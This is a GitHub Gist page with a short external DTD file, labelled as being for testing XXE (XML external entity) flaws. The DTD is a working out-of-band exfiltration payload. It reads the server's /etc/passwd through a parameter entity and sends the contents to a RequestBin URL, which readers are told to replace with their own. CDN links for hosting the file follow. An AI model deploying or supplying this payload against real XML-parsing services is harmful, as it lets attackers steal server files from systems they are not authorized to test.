Created
April 11, 2017 17:45
-
-
Save drewsberry/563a08960e88e1512f3fe9fa6a8072c1 to your computer and use it in GitHub Desktop.
XML Document Type Definition for testing for XXE (replace RequestBin URl with your own).
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!ENTITY % data SYSTEM "file:///etc/passwd"> | |
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'https://requestb.in/1fjht231?%data;'>"> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Development CDN URL: https://rawgit.com/drewsberry/563a08960e88e1512f3fe9fa6a8072c1/raw/2f0bffdcdffd8b785caab9747234acbb2223b5ab/xxe.dtd
Production CDN URL:
https://cdn.rawgit.com/drewsberry/563a08960e88e1512f3fe9fa6a8072c1/raw/2f0bffdcdffd8b785caab9747234acbb2223b5ab/xxe.dtd